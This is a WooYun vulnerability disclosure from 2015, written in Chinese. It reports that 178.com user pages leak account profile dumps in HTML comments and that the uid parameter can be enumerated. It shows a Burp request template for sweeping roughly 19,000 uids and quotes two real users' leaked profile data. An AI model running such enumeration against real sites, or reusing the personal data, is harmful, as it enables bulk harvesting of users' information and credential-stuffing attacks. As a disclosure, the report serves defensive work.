当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132721

漏洞标题:178游戏重要站点敏感信息泄露

相关厂商:178游戏网

漏洞作者: goubuli

提交时间:2015-08-08 23:03

修复时间:2015-09-24 13:10

公开时间:2015-09-24 13:10

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-08: 细节已通知厂商并且等待厂商处理中
2015-08-10: 厂商已经确认,细节仅向厂商公开
2015-08-20: 细节向核心白帽子及相关领域专家公开
2015-08-30: 细节向普通白帽子公开
2015-09-09: 细节向实习白帽子公开
2015-09-24: 细节向公众公开

简要描述:

178游戏重要站点敏感信息泄露

详细说明:

wooyun是一个非常好的学习平台。
今天浏览漏洞 WooYun: 178游戏重要站点SQL注射之官渡之战 ,随手又自己测了一下,发现一处信息泄露。
泄露信息包括:id,用户名,性别,生日(年龄),星座,邮箱,真实姓名,QQ,地址,电话等隐私信息。这段泄露的信息是在一段被注释掉的代码中,只有查看页面源文件才能看到。

<!-- 
array(36) {
["id"]=>
string(8) "36791303"
["username"]=>
string(8) "qq981021"
["gender"]=>
NULL
["birthday"]=>
string(10) "1998-11-20"
["astro"]=>
string(9) "天蝎座"
["resident"]=>
NULL
["email"]=>
string(17) "[email protected]"
["realname"]=>
NULL
["qq"]=>
NULL
["msn"]=>
NULL
["cellphone"]=>
NULL
["comefrom"]=>
NULL
["gender_flag"]=>
string(1) "1"
["r_province"]=>
string(18) "内蒙古自治区"
["r_city"]=>
string(9) "通辽市"
["r_district"]=>
string(9) "奈曼旗"
["h_province"]=>
string(18) "内蒙古自治区"
["h_city"]=>
string(9) "通辽市"
["h_district"]=>
string(9) "奈曼旗"
["bloodtype"]=>
string(1) "3"
["marriage"]=>
string(1) "1"
["customer"]=>
NULL
["privacy"]=>
string(250) "a:9:{s:5:"index";s:1:"0";s:4:"blog";s:1:"0";s:5:"album";s:1:"0";s:8:"comments";s:1:"0";s:4:"poll";s:1:"1";s:6:"search";s:1:"1";s:9:"footprint";s:1:"1";s:7:"friends";s:1:"1";s:3:"sms";a:5:{i:0;s:1:"1";i:1;s:1:"2";i:2;s:1:"3";i:3;s:1:"4";i:4;s:1:"5";}}"
["allow_search"]=>
string(1) "1"
["srank"]=>
array(2) {
["srank"]=>
array(6) {
["bloodtype"]=>
string(1) "1"
["marriage"]=>
string(1) "1"
["birthday"]=>
string(1) "0"
["astro"]=>
string(1) "1"
["resident"]=>
string(1) "0"
["home"]=>
string(1) "1"
}
["index"]=>
array(7) {
["gender"]=>
string(1) "1"
["bloodtype"]=>
string(1) "1"
["marriage"]=>
string(1) "1"
["birthday"]=>
string(1) "1"
["astro"]=>
string(1) "1"
["resident"]=>
string(1) "1"
["home"]=>
string(1) "1"
}
}
["notify"]=>
NULL
["status"]=>
string(1) "0"
["is_check"]=>
string(1) "0"
["update_time"]=>
string(1) "0"
["create_time"]=>
string(1) "0"
["acc_email"]=>
string(17) "[email protected]"
["acc_id"]=>
string(8) "36791303"
["uid"]=>
string(8) "36791303"
["acc_username"]=>
string(8) "qq981021"
["acc_nickname"]=>
string(8) "qq981021"
["nickname"]=>
string(8) "qq981021"
}
-->


产生原因:

uid可以遍历,http://i.178.com/?uid=36791303
直接查看其他注册用户信息,然后在对应的页面中查看源文件即可


如URL:

http://i.178.com/?uid=36792945


0808_2.png


我就测试了一下,burp跑了一些uid,

GET /?uid=§36790000§ HTTP/1.1
Host: i.178.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: _sid=46c23308cb0a98eab7e28be44c160709850008dd; _i=MyGjU0IJ9mk4gWh2UN145kkC8v82F6exNBdg%2BH4WcpjEufjFwzNwzg%3D%3D_bc62bd0a7e57b2536b39a3b54ee44046_1439008048; _l=1439007836; _178c=36809261%23%23testxxxx; _e=31536000; __utma=156161507.1140119810.1439007847.1439007847.1439007847.1; __utmb=156161507.4.10.1439007847; __utmc=156161507; __utmz=156161507.1439007847.1.1.utmcsr=account.178.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmt=1; CNZZDATA30044938=cnzz_eid%3D580410582-1439005044-http%253A%252F%252Faccount.178.com%252F%26ntime%3D1439005044
Connection: keep-alive
If-Modified-Since: Sat, 08 Aug 2015 04:27:27GMT


uid从36790000到36809260,如图

0808_1.png


危害:

由于178的登录只需要知道用户名或者邮箱即可登录,因此可被撞库,用户名被收集等


漏洞证明:

http://i.178.com/?uid=36791190


泄露处

<!-- 
array(36) {
["id"]=>
string(8) "36791190"
["username"]=>
string(15) "兰迪。奥顿"
["gender"]=>
NULL
["birthday"]=>
string(10) "1982-09-17"
["astro"]=>
string(9) "处女座"
["resident"]=>
NULL
["email"]=>
string(17) "[email protected]"
["realname"]=>
NULL
["qq"]=>
NULL
["msn"]=>
NULL
["cellphone"]=>
NULL
["comefrom"]=>
NULL
["gender_flag"]=>
string(1) "1"
["r_province"]=>
string(9) "四川省"
["r_city"]=>
string(6) "遂宁"
["r_district"]=>
string(9) "大英县"
["h_province"]=>
string(9) "河南省"
["h_city"]=>
string(9) "周口市"
["h_district"]=>
string(9) "扶沟县"
["bloodtype"]=>
string(1) "4"
["marriage"]=>
string(1) "1"
["customer"]=>
NULL
["privacy"]=>
NULL
["allow_search"]=>
string(1) "1"
["srank"]=>
array(2) {
["srank"]=>
array(6) {
["bloodtype"]=>
string(1) "0"
["marriage"]=>
string(1) "3"
["birthday"]=>
string(1) "3"
["astro"]=>
string(1) "3"
["resident"]=>
string(1) "3"
["home"]=>
string(1) "3"
}
["index"]=>
array(7) {
["gender"]=>
string(1) "1"
["bloodtype"]=>
string(1) "1"
["marriage"]=>
string(1) "1"
["birthday"]=>
string(1) "1"
["astro"]=>
string(1) "1"
["resident"]=>
string(1) "1"
["home"]=>
string(1) "1"
}
}
["notify"]=>
NULL
["status"]=>
string(1) "0"
["is_check"]=>
string(1) "0"
["update_time"]=>
string(1) "0"
["create_time"]=>
string(1) "0"
["acc_email"]=>
string(17) "[email protected]"
["acc_id"]=>
string(8) "36791190"
["uid"]=>
string(8) "36791190"
["acc_username"]=>
string(15) "兰迪。奥顿"
["acc_nickname"]=>
string(15) "兰迪。奥顿"
["nickname"]=>
string(15) "兰迪。奥顿"
}
-->


0808_3.png


修复方案:

删除注释中的代码

版权声明:转载请注明来源 goubuli@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-08-10 13:08

厂商回复:

感谢洞主对完美世界的关注,我们将尽快修补该漏洞。

最新状态:

暂无